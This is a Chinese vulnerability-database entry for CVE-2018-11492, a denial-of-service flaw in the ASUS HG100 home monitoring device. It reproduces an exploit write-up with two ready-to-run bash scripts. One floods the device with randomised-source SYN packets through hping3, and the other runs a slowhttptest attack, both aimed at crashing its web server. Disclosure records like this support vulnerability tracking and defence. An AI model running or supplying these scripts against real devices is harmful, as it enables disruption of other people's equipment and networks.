https://cxsecurity.com/issue/WLB-2019040168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201808-296
ASUS HG100 安全漏洞






漏洞ID | 1256172 | 漏洞类型 | 资源管理错误 |
发布时间 | 2019-04-18 | 更新时间 | 2019-10-23 |
![]() |
CVE-2018-11492 | ![]() |
CNNVD-201808-296 |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
ASUS HG100是华硕(ASUS)公司的一款家庭智能监控设备。
ASUS HG100中存在安全漏洞。攻击者可借助大量的IPv4数据包利用该漏洞造成拒绝服务。
|漏洞EXP
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14 # Exploit Author: YinT Wang;
# Vendor Homepage: www.asus.com
# Version: Hardware version: HG100 、Firmware version: 1.05.12
# Tested on: Currnet 1.05.12
# CVE : CVE-2018-11492
1. Description
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
2.Proof of Concept
Just Execute the following script in kali which could crash the devices
1. IPv4 packet and in result of devices crash.which written in linux script.
#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
exit 0
2.Slowhttp test and caused the devices crash.which written in linux script.
#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0
|参考资料
来源:mars-cheng.github.io
链接:https://mars-cheng.github.io/blog/2018/CVE-2018-11492/
检索漏洞
开始时间
结束时间